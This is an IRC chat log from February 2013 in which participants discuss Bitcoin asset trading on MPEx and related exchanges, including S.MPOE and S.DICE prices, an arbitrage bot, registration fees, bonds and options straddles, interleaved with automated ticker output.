ahhahaha Feb 03 01:21:04 maybe your key gets disabled...on accident Feb 03 01:21:06 i think that's what the registration is for Feb 03 01:21:13 i'm just trying to check the number till i release it in the wild Feb 03 01:21:25 sorta like make sure i keep mpex small. bludgeon successful people, something like that ? Feb 03 01:21:47 i really love the mpex model as is Feb 03 01:21:51 agorist Feb 03 01:22:01 jurov well, over 1k ? over 10k ? Feb 03 01:22:03 tada... bit over 38 BTC Feb 03 01:22:10 o hey. Feb 03 01:22:10 :D Feb 03 01:22:13 not bad Feb 03 01:22:17 very nice Feb 03 01:22:20 it IS more than bbet Feb 03 01:22:24 fuck this im nuking his acct. Feb 03 01:22:29 lulz Feb 03 01:22:30 :DD Feb 03 01:22:54 mpoe-pr should post in foerum "jurov's shares discarded as worthless!" Feb 03 01:22:57 then jurov could whine Feb 03 01:23:03 we could probably take over the forum for a day Feb 03 01:23:15 isn't that how business used to work? Feb 03 01:23:23 someone competes with you, you burn down their factory? Feb 03 01:23:29 i think that's how business used to fail Feb 03 01:23:58 Rockefella's aren't complaining... Feb 03 01:24:24 i'll enumerate all the mpex interface bugs in lengthy and entertaining post Feb 03 01:24:33 well, that is another thing i like about this economy and specifcally mpex...everyone is expected to be responsible for themselves Feb 03 01:24:36 1e20 options Feb 03 01:24:40 phantom orders Feb 03 01:24:49 LOL Feb 03 01:24:49 empty statjsons Feb 03 01:25:00 php/mysql error messages Feb 03 01:25:18 you name it Feb 03 01:25:33 i'll pay usagi to read Strategic Risk Management to you for a week straight. Feb 03 01:25:49 oh and i forgot double credited deposits Feb 03 01:26:03 that i kept, of course Feb 03 01:26:22 i should have totally had roger ver on staff, Feb 03 01:26:26 just for that. Feb 03 01:26:48 You guys would have a fight though after about 2 weeks. Feb 03 01:30:02 jurov for the record, the vircures guy was listing it Feb 03 01:30:07 11 btc profits Feb 03 01:30:15 vircurex? Feb 03 01:30:27 [MPEX] [S.MPOE] 13095 @ 0.00066269 = 8.6779 BTC [-] Feb 03 01:30:28 [MPEX] [S.MPOE] 19955 @ 0.00066284 = 13.227 BTC [+] Feb 03 01:32:03 ya Feb 03 01:32:18 oh, and *if* i go IPO Feb 03 01:32:28 coinbr should stay private Feb 03 01:32:34 i'll do it on bitfunder. just from spite Feb 03 01:32:41 :D Feb 03 01:32:54 Why not BTCT.co Feb 03 01:33:01 I like BTCT.co Feb 03 01:33:21 why do you spite ukto ?! Feb 03 01:33:29 I don't Feb 03 01:33:38 I just prefer BTCT.co first Feb 03 01:33:53 i can operate btct and cryptostocks passthroughs Feb 03 01:33:56 actually, MPEx>BTCT.co>Bitfunder Feb 03 01:33:59 heard passthroughs are cool Feb 03 01:34:01 [MPEX] [S.MPOE] 1132 @ 0.00066284 = 0.7503 BTC [+] Feb 03 01:34:03 [MPEX] [S.MPOE] 4518 @ 0.00066466 = 3.0029 BTC [+] Feb 03 01:34:06 cryptostock is a joke Feb 03 01:34:30 Namworld i didn't mean you. i meant him. list on there just out of spite Feb 03 01:34:50 oh Feb 03 01:35:59 cause i can tyrannize ukto with special functionality requests Feb 03 01:36:21 unlike MP Feb 03 01:36:26 tyrannize? Feb 03 01:37:04 he had to add few things to bf for my assets to work Feb 03 01:37:06 [MPEX] [S.MPOE] 5482 @ 0.00066466 = 3.6437 BTC [+] Feb 03 01:37:11 [MPEX] [S.MPOE] 4000 @ 0.00067028 = 2.6811 BTC [+] Feb 03 01:37:13 [MPEX] [S.MPOE] 10963 @ 0.00067229 = 7.3703 BTC [+] Feb 03 01:37:14 [MPEX] [S.MPOE] 7000 @ 0.00067294 = 4.7106 BTC [+] Feb 03 01:37:22 nice, twitter got hacked due to ruby on rails Feb 03 01:37:24 ukto is basically a masochist, he's just looking for more things to implement Feb 03 01:37:27 [MPEX] [S.MPOE] 1900 @ 0.00067481 = 1.2821 BTC [+] Feb 03 01:37:29 [MPEX] [S.MPOE] 15650 @ 0.0006749 = 10.5622 BTC [+] Feb 03 01:37:35 lol Feb 03 01:37:37 200k users compromised Feb 03 01:37:46 when that guy from bitmillions ShaTwo was here, ukto was all "omg i was working on implementing that" Feb 03 01:37:56 i think he's working on implementing a bitcoin-based c compiler too Feb 03 01:37:57 here Feb 03 01:38:02 o hai. Feb 03 01:38:45 No, I am working in a Bitcoin Node in CoffeeScript Feb 03 01:39:11 not you. ukto. Feb 03 01:39:17 Ahh.. ok Feb 03 01:39:32 Ruby and Rails is a very bad choise Feb 03 01:39:50 mircea_popescu: a bitcoin-based c compiler? Feb 03 01:39:58 how does that work? Feb 03 01:40:18 yeah, ror is about as bad an idea as java Feb 03 01:40:22 thestringpuller now that i dunno. Feb 03 01:40:32 merkle tree compiler objects or some shit Feb 03 01:40:39 ... Feb 03 01:40:42 ..... Feb 03 01:40:44 ....... Feb 03 01:41:49 [MPEX] [S.MPOE] 6250 @ 0.00067553 = 4.2221 BTC [+] Feb 03 01:41:50 [MPEX] [S.MPOE] 4504 @ 0.00067746 = 3.0513 BTC [+] Feb 03 01:41:52 [MPEX] [S.MPOE] 6696 @ 0.00067748 = 4.5364 BTC [+] Feb 03 01:42:30 ;;ticker Feb 03 01:42:32 BTCUSD ticker | Best bid: 19.50002, Best ask: 19.64594, Bid-ask spread: 0.14592, Last trade: 19.50000, 24 hour volume: 80815.43101719, 24 hour low: 18.00000, 24 hour high: 20.60000, 24 hour vwap: 19.47478 Feb 03 01:42:55 [MPEX] [S.MPOE] 10924 @ 0.00067526 = 7.3765 BTC [-] Feb 03 01:44:55 mircea_popescu: movin on up, to a deluxe apartment in the sky, finally got a piece of the pie Feb 03 01:46:41 [MPEX] [S.MPOE] 1427 @ 0.00066215 = 0.9449 BTC [-] Feb 03 01:46:43 [MPEX] [S.MPOE] 4500 @ 0.00066215 = 2.9797 BTC [-] Feb 03 01:46:46 [MPEX] [S.MPOE] 13296 @ 0.00066214 = 8.8038 BTC [-] Feb 03 01:55:29 !ticker m s.mpoe Feb 03 01:55:30 [MPEX:S.MPOE] 1D: 0.00064676 / 0.00066678 / 0.00068038 (2261829 shares, 1,508.16 BTC), 7D: 0.00063335 / 0.00066174 / 0.0006921 (12850846 shares, 8,503.95 BTC), 30D: 0.00059445 / 0.00065757 / 0.0007 (55193692 shares, 36,293.80 BTC) Feb 03 02:01:55 smickles, teh script still not working? Feb 03 02:02:39 no i take back, got it ;) Feb 03 02:09:26 [BTCTC] [GSDPT] 400 @ 0.008 = 3.2 BTC [+] Feb 03 02:10:21 [BTCTC] [GSDPT] 233 @ 0.008 = 1.864 BTC [+] Feb 03 02:11:38 [HAVELOCK] [SDICE] 10 @ 0.8 = 8 BTC [+] Feb 03 02:17:57 [MPEX] [S.MPOE] 878 @ 0.00067153 = 0.5896 BTC [+] Feb 03 02:18:42 !ticker m s.dice Feb 03 02:18:43 [MPEX:S.DICE] 1D: 0.007148 / 0.00737041 / 0.007395 (115802 shares, 853.51 BTC), 7D: 0.00534524 / 0.00732076 / 0.00749999 (596803 shares, 4,369.05 BTC), 30D: 0.00085848 / 0.00490917 / 0.0075 (6480913 shares, 31,815.93 BTC) Feb 03 02:18:45 !ticker h sdice Feb 03 02:18:49 [HAVELOCK:SDICE] 1D: 0.75670000 / 0.78370988 / 0.88000000 (357 shares, 279.78442750 BTC), 7D: 0.56110000 / 0.74968829 / 0.89000000 (1487 shares, 1114.78649361 BTC), 30D: 0.37000000 / 0.55886946 / 0.89000000 (6445 shares, 3601.91367845 BTC) Feb 03 02:18:51 !ticker btctc gsdpt sdice Feb 03 02:18:53 [BTCT:GSDPT] 1D: 0.0075 / 0.0079 / 0.008 (2807 shares, 22.2 BTC), 7D: 0.0069 / 0.01 / 0.008 (19655 shares, 147.9 BTC), 30D: 0.0042 / 0.01 / 0.008 (45197 shares, 289.8 BTC) Feb 03 02:19:29 ;;calc 0.88000000 / 0.007395 Feb 03 02:19:31 118.999323867 Feb 03 02:19:39 ;;calc 0.78370988 / 0.00737041 Feb 03 02:19:41 106.331924547 Feb 03 02:20:47 and they yell at me for tickering all the time :P Feb 03 02:22:06 [MPEX] [S.MPOE] 1208 @ 0.00067748 = 0.8184 BTC [+] Feb 03 02:22:06 [MPEX] [S.MPOE] 4321 @ 0.00067834 = 2.9311 BTC [+] Feb 03 02:24:46 [MPEX] [S.MPOE] 4321 @ 0.00067557 = 2.9191 BTC [-] Feb 03 02:24:48 [MPEX] [S.MPOE] 9079 @ 0.00067546 = 6.1325 BTC [-] Feb 03 02:26:21 :p **** BEGIN LOGGING AT Sun Feb 3 10:22:57 2013 Feb 03 10:23:00 +200 div Feb 03 10:23:09 more with past months Feb 03 10:23:24 how goes Feb 03 10:23:39 i built a fun bot that tries to market make Feb 03 10:23:41 7600*20$ Feb 03 10:23:42 [MPEX] [S.DICE] 1580 @ 0.007395 = 11.6841 BTC [+] Feb 03 10:23:54 150K$ Feb 03 10:24:00 ... Feb 03 10:24:15 yup error... Feb 03 10:24:18 mjr_ which exchanges ? Feb 03 10:24:25 just mpex data so far Feb 03 10:24:33 spread is crazy on sdice Feb 03 10:24:43 5.58% Feb 03 10:24:50 o, you arbing the pts ? Feb 03 10:25:12 nah just sdice right now, though i can plug in any symbol and it will check it for spreads greater than fees Feb 03 10:25:32 also mpoe...but only with .541 % Feb 03 10:25:43 can barely squeeze a profit there Feb 03 10:25:57 https://mega.co.nz/#!okpFSZ7B!cuclFyKX_j1C-Ub7LJoeRHM2OzREhD6camzHMQ60gnY Feb 03 10:26:10 and this is only the scanning calculating part of it Feb 03 10:26:16 i need an order interface Feb 03 10:26:24 but can't find out how to do that on coinbr Feb 03 10:28:09 [MPEX] [S.MPOE] 4321 @ 0.0006738 = 2.9115 BTC [+] Feb 03 10:28:12 [MPEX] [S.MPOE] 140 @ 0.00067379 = 0.0943 BTC [-] Feb 03 10:29:56 if i can build a somewhat abstract order interface, then i could put it on multiple exchanges...which would be nice Feb 03 10:30:09 havelock seems to have different prices on s.dice Feb 03 10:31:18 [MPEX] [S.MPOE] 669 @ 0.00067745 = 0.4532 BTC [+] Feb 03 10:31:26 [MPEX] [S.MPOE] 1126 @ 0.00067861 = 0.7641 BTC [+] Feb 03 10:31:28 [MPEX] [S.MPOE] 4321 @ 0.00068168 = 2.9455 BTC [+] Feb 03 10:31:29 [MPEX] [S.MPOE] 7312 @ 0.00068169 = 4.9845 BTC [+] Feb 03 10:31:41 mpoe up to 1.17% Feb 03 10:32:42 if anyone wants my code to play around with it, they are welcome to it Feb 03 10:36:40 wrong degree... Feb 03 10:36:58 just disappeared Feb 03 10:37:36 [MPEX] [S.MPOE] 2950 @ 0.00068152 = 2.0105 BTC [-] Feb 03 10:37:55 back now at .5% is that wrong? Feb 03 10:41:43 what's wrong ? Feb 03 10:43:03 oh, error said wrong degree Feb 03 10:43:13 so i wasn't sure if i was calculating the spread correctly Feb 03 10:45:59 [MPEX] [S.MPOE] 4321 @ 0.00067398 = 2.9123 BTC [-] Feb 03 10:46:00 [MPEX] [S.MPOE] 12579 @ 0.00067379 = 8.4756 BTC [-] Feb 03 10:46:17 ;;calc 0.00067379 / 0.00067745 Feb 03 10:46:18 0.994597387261 Feb 03 10:46:26 looks like .5 to me Feb 03 10:46:42 that's really weird Feb 03 10:47:39 anyway, i think i did it right Feb 03 10:50:33 [MPEX] [S.MPOE] 11058 @ 0.0006754 = 7.4686 BTC [+] Feb 03 10:52:37 *school degrees Feb 03 10:52:52 sorry Feb 03 10:53:00 what was your degree in? Feb 03 10:53:17 mine was business admin Feb 03 10:55:10 philosophy. Feb 03 10:55:22 that is a great degree Feb 03 10:55:45 math is very philosophical now Feb 03 10:56:11 the wrong degrees Feb 03 10:57:33 SatoshiDice is slow Feb 03 10:57:37 you'r soo stupid at 18 years, why we have to choose a such important think like a futur at this stupid age Feb 03 10:57:49 heh who told you you're "choosing yoiur future" Feb 03 10:58:03 to return my transactions Feb 03 10:58:04 touche Feb 03 10:58:25 I probably didn't win anyway =P Feb 03 10:58:39 you play SD ? Feb 03 10:58:47 thanks for this good month Feb 03 10:58:49 it actually works out ok i think Feb 03 10:58:54 I haven't played in month Feb 03 10:58:59 and had like half a BTC Feb 03 10:59:04 months* Feb 03 10:59:04 usually you never do what you went to school for Feb 03 10:59:10 in my gambling addy Feb 03 10:59:21 ooh sdice finally dropping Feb 03 10:59:33 down to 2.92% Feb 03 10:59:37 [MPEX] [S.DICE] 950 @ 0.00718504 = 6.8258 BTC [-] Feb 03 10:59:43 i mean spread Feb 03 11:00:04 lol did i beat assbot? Feb 03 11:00:24 do u try out BitMillions ? Feb 03 11:00:36 I used the dice with the best long term return odds Feb 03 11:00:47 haha Feb 03 11:00:52 the 98.156% one xD Feb 03 11:00:58 hahaha Feb 03 11:01:02 The dice you never win Feb 03 11:01:26 the best ood is mine Feb 03 11:01:39 just buy some share but never play Feb 03 11:02:14 *odds *bought Feb 03 11:02:32 oh, yeah Feb 03 11:02:38 definitly not a english degree... Feb 03 11:02:39 That's good too Feb 03 11:03:06 hey namworld, how do you place orders through coinbr? Feb 03 11:03:23 I have no idea Feb 03 11:03:32 do they have an api? i signed up but i can't find anything Feb 03 11:03:41 No idea Feb 03 11:03:53 ask jurov Feb 03 11:04:03 i've been waiting for him... Feb 03 11:04:18 I never touched coinbr Feb 03 11:04:52 [MPEX] [S.MPOE] 21849 @ 0.0006754 = 14.7568 BTC [+] Feb 03 11:04:57 btctc.co Feb 03 11:05:00 Q. How do I do short trades with CoinBr? Feb 03 11:05:00 MPEx offers support for short trading/market making futures and options, using MKFUT/MKOPT/SPLIT commands. There is no GUI on CoinBr for them yet, but we'll do it for you when asked over e-mail or IRC. Only MPEx fee, if any, will be asked atm. Feb 03 11:05:00 « Last Edit: January 24, 2013, 01:34:42 PM by CoinBr » Feb 03 11:05:25 yeah, i wasn't planning on those orders Feb 03 11:05:29 just simple buy orders Feb 03 11:05:32 http://www.bitcoinforum.com/coinbr-com/frequently-asked-questions/?PHPSESSID=md5c8c2lr382ub31vpbtg7dl86 Feb 03 11:06:33 Ok, off for a bit Feb 03 11:06:40 that's whats weird...i don't see any gui for orders, but maybe they dynamically turn that on once funds arrive? Feb 03 11:06:48 have a good one namworld Feb 03 11:07:31 [MPEX] [S.MPOE] 9432 @ 0.0006754 = 6.3704 BTC [+] Feb 03 11:07:33 [MPEX] [S.MPOE] 868 @ 0.00067379 = 0.5848 BTC [-] Feb 03 11:09:57 jjticker Feb 03 11:10:01 ;;ticker Feb 03 11:10:08 BTCUSD ticker | Best bid: 19.90002, Best ask: 19.98898, Bid-ask spread: 0.08896, Last trade: 19.90001, 24 hour volume: 41906.77847932, 24 hour low: 18.70000, 24 hour high: 20.20000, 24 hour vwap: 19.69482 Feb 03 11:10:34 mjr_ why not talk straight to mpex tho ? Feb 03 11:10:51 believe me i plan on it Feb 03 11:11:05 as soon as i can i will be registering Feb 03 11:11:19 but until then i figured i would just go through jurov Feb 03 11:11:28 ya but i don't think he's actually implemented an api Feb 03 11:11:33 oh.... Feb 03 11:11:34 on account of it being silly to have a long api pipe Feb 03 11:11:40 yeah true Feb 03 11:11:52 well i mean, i wouldn't mind if he just passed through Feb 03 11:12:17 i think coinbr is more intended to help the people who want to trade on a website/don't want to handle computer guts Feb 03 11:12:20 such as apis or gpgs Feb 03 11:12:24 after all, he is just sending it with a slight markup on fee, and he really only needs to keep track of that on his end Feb 03 11:12:46 i agree and i don't mind dealing with gpg and any other computer related thing Feb 03 11:12:52 but i can't afford registration yet Feb 03 11:12:59 so once i can, i will be on there Feb 03 11:13:03 soon enough i hope Feb 03 11:13:04 hm. i guess you might actually be in a crack Feb 03 11:13:17 by then mp might jack the price to 35 btc :2 Feb 03 11:13:22 or 50. Feb 03 11:13:24 that's ok Feb 03 11:13:35 it'll still be worth it for a long time i think Feb 03 11:13:45 is there a way to sell mpex account? Feb 03 11:13:58 you'd have to give up gpg ident Feb 03 11:14:00 i believe Feb 03 11:14:09 and that is if it's allowed Feb 03 11:14:14 Is there some way I could be an affiliate ? Feb 03 11:14:15 Sure. If you already have an account and someone mentions your keyid when they sign up for a new account each of you will be credited 5 BTC. Simple as pie. Feb 03 11:14:35 you just need 25BTC for start ;) Feb 03 11:14:39 true Feb 03 11:14:59 so that is approx...$500 Feb 03 11:15:13 i dont wanna deal with that stuff.. that guy who fat fingered about 70k USD on dice Feb 03 11:15:19 another 10 btc to fund the account (that is the minimum right?) Feb 03 11:15:36 yeah Feb 03 11:15:46 so $700 to get started... Feb 03 11:15:47 well a bit more than 10btc since you need some numbers Feb 03 11:15:50 mjr_ nah. the minimum deposit is 10 btc Feb 03 11:15:54 to identify Feb 03 11:15:59 if you make a 30 btc deposit that's clearly over the 10 btc limit Feb 03 11:16:09 oh, i thought that was a fee Feb 03 11:16:10 then if you are referred tyou get 5 back so you have a little to trade on Feb 03 11:16:18 ya it is a fee, but taken out of your first deposit Feb 03 11:16:20 ah i see Feb 03 11:16:28 cool Feb 03 11:16:36 well i think i may be able to do it Feb 03 11:16:46 tough on the 1st of the month, but i figure it will be worth it Feb 03 11:17:15 amazing the spread on these puts Feb 03 11:17:48 ya, the spread on the options has been a point of discussion since about october 2011 Feb 03 11:17:52 "wow huge spreads!" Feb 03 11:17:55 "so go midmarket." Feb 03 11:18:01 "umm... hm. eh. nm." Feb 03 11:18:07 finish him, run some simulation and time will see ! Feb 03 11:18:08 yeah...i'll just go a satoshi inside of both sides Feb 03 11:18:26 that is what i don't get Feb 03 11:18:30 [MPEX] [S.MPOE] 2550 @ 0.00067737 = 1.7273 BTC [+] Feb 03 11:18:32 someone would usually do that Feb 03 11:18:37 [MPEX] [S.MPOE] 4321 @ 0.0006821 = 2.9474 BTC [+] Feb 03 11:18:39 [MPEX] [S.MPOE] 1980 @ 0.00068169 = 1.3497 BTC [-] Feb 03 11:18:39 [MPEX] [S.MPOE] 749 @ 0.00068211 = 0.5109 BTC [+] Feb 03 11:18:41 and then someone else would jump in front of him Feb 03 11:18:57 mpoe just jumped back on my radar :) Feb 03 11:21:14 ;;asks 19.9999 Feb 03 11:21:17 There are currently 7.9857751 bitcoins offered at or under 19.9999 USD, worth 159.627578416 USD in total. Feb 03 11:21:19 so question, do you send back an ack type message? Feb 03 11:21:30 after successful order Feb 03 11:21:41 or do you have to stat Feb 03 11:22:02 you get a signed "your order to x was received" Feb 03 11:22:16 to see execution you have to either watch reporting or stat Feb 03 11:22:26 cool Feb 03 11:22:48 reporting being the json right? Feb 03 11:24:55 no, reporting being rss, twitter or here Feb 03 11:25:00 oh cool Feb 03 11:25:01 stat being stat or statjson Feb 03 11:25:32 but you have to send statjson command signed by pgp Feb 03 11:25:37 ya Feb 03 11:25:39 ok cool Feb 03 11:25:40 late today i'll ask my friend to look on your code ! he coul'd be interested Feb 03 11:25:49 stats tell you details about your acct specifically. Feb 03 11:25:49 i think it could be nice Feb 03 11:26:02 my code, and yeah, i figured it was like a summary Feb 03 11:26:04 reporting is global, but if you know you just ordered 5k of s.blabla and 4k trade at your price Feb 03 11:26:12 you know you got filled for 4k or something likethat Feb 03 11:26:15 ah ok Feb 03 11:26:17 so i will diff Feb 03 11:26:21 and keep track Feb 03 11:26:43 [MPEX] [S.MPOE] 1464 @ 0.00068207 = 0.9986 BTC [-] Feb 03 11:26:46 the cool thing about the code, is that it takes into account volume somewhat Feb 03 11:26:52 and its still pretty rough Feb 03 11:27:13 but you can't jump in front unless you put small volume Feb 03 11:27:24 in which case i want to be behind at the next price level Feb 03 11:27:26 https://bitcointalk.org/index.php?topic=101902.msg1499501#msg1499501 usagi is totally cool Feb 03 11:27:34 haha Feb 03 11:27:36 0.5 Feb 03 11:27:46 "This is a difficult concept for new or inexperienced investors to grasp" Feb 03 11:27:47 he's on crack Feb 03 11:27:48 end quote. Feb 03 11:27:59 [MPEX] [S.MPOE] 2900 @ 0.0006742 = 1.9552 BTC [-] Feb 03 11:28:01 [MPEX] [S.MPOE] 2200 @ 0.00067404 = 1.4829 BTC [-] Feb 03 11:28:20 the funny thing is tho... i don't think .8 sort of insanity is TOTALLY off the table on a 1-2 year span Feb 03 11:28:29 then again, 0.0 isn't totally off the table on those sorts of intervals either. Feb 03 11:28:35 heck, btc may fail by 2015 Feb 03 11:29:01 go big or go home Feb 03 11:30:13 i can sort-of see some large player going 50-100mn for satoshidice Feb 03 11:30:43 if that happens when btc is in the teens it may well be something like 0.x oper share Feb 03 11:30:47 ok, me too. be we're still far away from 0.8 Feb 03 11:31:18 !ticker m s.dice Feb 03 11:31:21 [MPEX:S.DICE] 1D: 0.00703438 / 0.00732547 / 0.007395 (84338 shares, 617.82 BTC), 7D: 0.00534524 / 0.00731809 / 0.00749999 (638455 shares, 4,672.28 BTC), 30D: 0.00085848 / 0.00496255 / 0.0075 (6355965 shares, 31,541.85 BTC) Feb 03 11:31:33 ;;calc 0.8*732547*20 Feb 03 11:31:34 11720752 Feb 03 11:31:58 basically the entire economy right now Feb 03 11:32:03 lol Feb 03 11:32:05 um wtf Feb 03 11:32:14 wasn't that number in btc Feb 03 11:32:14 i fucked it uyp lol Feb 03 11:32:18 ah ok Feb 03 11:32:21 ;;calc 0.8*100000000*20 Feb 03 11:32:22 1600000000 Feb 03 11:32:36 ya if it were .8 now that'd value s.dice at 1.6bn Feb 03 11:32:39 seems untenable. Feb 03 11:32:40 [MPEX] [S.MPOE] 8743 @ 0.00068211 = 5.9637 BTC [+] Feb 03 11:32:41 [MPEX] [S.MPOE] 2857 @ 0.00068207 = 1.9487 BTC [-] Feb 03 11:32:42 [BTCTC] [GSDPT] 7 @ 0.0074 = 0.0518 BTC [-] Feb 03 11:32:45 yep Feb 03 11:32:53 course... fb sold for 100bn Feb 03 11:32:56 equally untenable. Feb 03 11:33:06 0.08 seem more realistic Feb 03 11:33:08 yes and insta for one billion Feb 03 11:33:27 error4733 tbh .0075 or w/e seems the most realistic atm :) Feb 03 11:33:44 i guess Feb 03 11:33:45 i don't know about growth Feb 03 11:33:54 but finding a yield like that is tough Feb 03 11:35:02 anyway, i hold ALL my S.dice Feb 03 11:35:20 i think .01 by the end of the year Feb 03 11:35:35 I'd say so too. 0.0075 seems nice at the moment Feb 03 11:35:35 which is great growth, and great return Feb 03 11:35:52 There's always the risk of betting on SD going down Feb 03 11:36:22 It remains that S.DICE has risk like anything else. 0.0075 is good to me. Feb 03 11:36:29 the risk of betting on it and it going down, or the risk of betting on it going down Feb 03 11:37:04 well Feb 03 11:37:09 it depends on your outlook Feb 03 11:37:19 and i for one am guessing that you guys are into bitcoins Feb 03 11:37:38 in which case, unless the shares go to 0...you still have appreciation Feb 03 11:38:30 If shares drop, that might still be less than if we kept Bitcoins alone. Feb 03 11:38:32 that's the important part for many people i guess Feb 03 11:38:38 with rewards going down and diff going up, Feb 03 11:38:44 btc revenue streams increase in value Feb 03 11:38:48 yeah Feb 03 11:38:55 you will get btc from dividends Feb 03 11:39:08 so it would be hard for you to have less btc than when you started, not impossible Feb 03 11:39:14 but hard Feb 03 11:39:34 i am gonna mix it up a bit Feb 03 11:39:43 some bonds from namworld, some mpoe and some s.dice Feb 03 11:40:06 thanks Feb 03 11:40:36 it's always good to mix. Feb 03 11:41:35 read the FAQ before buying MPOE haha Feb 03 11:42:01 i did Feb 03 11:42:04 it looks good Feb 03 11:42:05 and yes Feb 03 11:42:05 [joke] i got some Feb 03 11:42:11 i wil make sure to send it to the right addresss Feb 03 11:42:23 the signifigant digits Feb 03 11:42:24 I have a founder and CEO of a company in the financial sector as the top holder of my BTC-BOND Feb 03 11:42:31 I found it somewhat odd. Feb 03 11:42:34 nice Feb 03 11:42:36 i don't Feb 03 11:42:41 why odd ? Feb 03 11:42:44 10% is unheard of for a bond Feb 03 11:42:51 right now at least Feb 03 11:42:59 one that you will actually get the money back Feb 03 11:43:07 .5% is like bond rates now Feb 03 11:43:34 Odd because BTC-BOND is a small thing lost in the middle of tons of larger offers. Feb 03 11:43:40 yeah Feb 03 11:44:04 and Bitcoins to top it. I wasn't expecting someone from the financial sector to find his way to my little thing. Feb 03 11:44:32 your brother-in-law ? Feb 03 11:44:33 I would have expected for S.DICE and such, someone putting a few 10k for fun. Feb 03 11:45:08 error: no, complete stranger Feb 03 11:45:23 BTCT.co sends a list of holders every 12 hours Feb 03 11:45:44 I thought at first someone filled an email that was not his Feb 03 11:46:00 Ended up being genuine. Feb 03 11:46:43 Namworld maybe they just want to watch you at work, learn about btc etc. Feb 03 11:47:30 My contract state it's a personal loan, that can be spent on whatever I see fit. Feb 03 11:47:41 so ? Feb 03 11:48:36 I disbursed an extra coupon when I did good option trades. The guy didn't seem to know I was trading actively. Feb 03 11:48:56 Other than I kept stocks collateral on GLBSE for the loan. Feb 03 11:49:01 3 million bitcoins won already ho lee schitt! Feb 03 11:49:03 question Feb 03 11:49:10 http://satoshidice.com/ Feb 03 11:49:29 ? Feb 03 11:49:31 do you have a limited number of bonds? Feb 03 11:49:44 or would you just increase your holdings to accept more Feb 03 11:49:48 50000 bonds for now (500 BTC) Feb 03 11:50:07 I'm not sure I want to manage more funds... Feb 03 11:51:12 yeah i get you Feb 03 11:51:15 just curious Feb 03 11:51:16 Not as a loan at least. Feb 03 11:51:42 having a cap is a great saferty play, and one the various wannabe managers in the past eschewed to their detriment. Feb 03 11:51:57 if they did have caps for all their pirate stuff they wouldn't be quite as in the pits today Feb 03 11:52:35 If they had a cap higher than 0 for pirate stuff I don't quite see why they'd deserve holding even a bitcent... Feb 03 11:53:32 Namworld if they did, I personally insure this thing, but it never takes more than 100 btc Feb 03 11:53:44 THEN they could have just paid out of pocket and closed cleanly. Feb 03 11:53:55 they did I personally insure and there's no cap. Feb 03 11:53:56 well... Feb 03 11:53:59 that doesn't work so good. Feb 03 11:54:26 yeah Feb 03 11:55:04 Although I could always manage funds on another basis than a loan Feb 03 11:55:10 Where I'd get a smaller cut Feb 03 11:55:32 maybe there'd be a taste for more reward/more risk Feb 03 11:55:40 but even so, caps are almost always a good idea. Feb 03 11:55:44 [MPEX] [S.MPOE] 2121 @ 0.00067404 = 1.4296 BTC [-] Feb 03 11:55:46 [MPEX] [S.MPOE] 10054 @ 0.00067379 = 6.7743 BTC [-] Feb 03 11:55:47 [MPEX] [S.MPOE] 10900 @ 0.00067186 = 7.3233 BTC [-] Feb 03 11:55:49 [MPEX] [S.MPOE] 10000 @ 0.00067001 = 6.7001 BTC [-] Feb 03 11:55:50 [MPEX] [S.MPOE] 49 @ 0.00067 = 0.0328 BTC [-] Feb 03 11:55:52 there's so little know with certainty in btc, any added certainty is a net gain Feb 03 11:56:25 aye Feb 03 11:56:47 In any case... where are all the DMC holders? Feb 03 11:57:00 i think actually a good way to regard manager's position is to look at added value Feb 03 11:57:00 Why can't all asset holders hang in here? Feb 03 11:57:03 what does he contribute ? Feb 03 11:57:09 the chief thing he could be contributing is certainty Feb 03 11:57:27 Namworld i think the girl sums it up good : https://bitcointalk.org/index.php?topic=140484.msg1500250#msg1500250 Feb 03 11:57:30 hobbysts Feb 03 11:59:24 yes Feb 03 12:00:03 and there goes all the spreads Feb 03 12:00:14 But at the size of what I do, it should be considered hobbyist work. I'm working with small sums Feb 03 12:03:54 mircea_popescu: quick question about options Feb 03 12:04:03 do you consider positions hedged? Feb 03 12:04:19 for example if i had the put and the call Feb 03 12:04:40 how would you calculate total exposure Feb 03 12:04:52 or...what do you call it again? collateral needed to hold that position Feb 03 12:05:33 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc#gid=0 Feb 03 12:05:33 it should be risk neutral...and all i should be able to lose is the premium i pay Feb 03 12:05:50 Capital required to CREATE options Feb 03 12:06:16 i am not creating them Feb 03 12:06:19 i am buying them Feb 03 12:06:34 Then why should there be any collateral? Feb 03 12:06:35 so you don't need capital to buy Feb 03 12:06:43 If you buy an option? Feb 03 12:06:49 not sure, i thought it was weird Feb 03 12:07:09 but i always heard people talking about collateral with their options Feb 03 12:07:16 i just want to buy put and call Feb 03 12:07:24 but the same theory holds... Feb 03 12:07:25 The creator puts collateral and sell the option at less than its redeem value in the hope of a profit. Feb 03 12:07:39 if i sell the put and i sell the call Feb 03 12:07:50 i should be in a risk neutral position Feb 03 12:07:50 The buyer pays that premium, and stand to eat that collateral or get nothing Feb 03 12:08:13 The collateral is usually much larger than the sale price Feb 03 12:08:14 short straddle is what it is called... Feb 03 12:08:23 If you sold puts and calls, you could still lose Feb 03 12:08:37 you could lose, but limited Feb 03 12:08:38 If price swayed a lot in one direction Feb 03 12:08:44 yes, that is the point of them Feb 03 12:08:49 yup Feb 03 12:09:03 [MPEX] [S.MPOE] 5000 @ 0.00068194 = 3.4097 BTC [+] Feb 03 12:09:05 [MPEX] [S.MPOE] 4321 @ 0.00068195 = 2.9467 BTC [+] Feb 03 12:09:25 Use my Google Spreadsheets stuff. Just handy. Feb 03 12:09:25 i like long straddle Feb 03 12:09:29 yeah i like it Feb 03 12:09:41 or strangle Feb 03 12:10:03 i have been trying to do some simulations and modeling of weighting the strike prices differently to find the best mid of risk, cost, and profit Feb 03 12:10:54 like say i had call put at 20, call at 21, put at 19 Feb 03 12:11:34 how much should i weight the inner straddle vs the outer strangle Feb 03 12:11:49 because the straddle will cost the most Feb 03 12:12:37 [MPEX] [S.MPOE] 3350 @ 0.00067593 = 2.2644 BTC [-] Feb 03 12:12:39 [MPEX] [S.MPOE] 4321 @ 0.0006702 = 2.8959 BTC [-] Feb 03 12:12:41 [MPEX] [S.MPOE] 4321 @ 0.00067007 = 2.8954 BTC [-] Feb 03 12:12:42 [MPEX] [S.MPOE] 258 @ 0.00067 = 0.1729 BTC [-] Feb 03 12:16:48 [MPEX] [S.MPOE] 4321 @ 0.00068181 = 2.9461 BTC [+] Feb 03 12:16:50 [MPEX] [S.MPOE] 1621 @ 0.00068211 = 1.1057 BTC 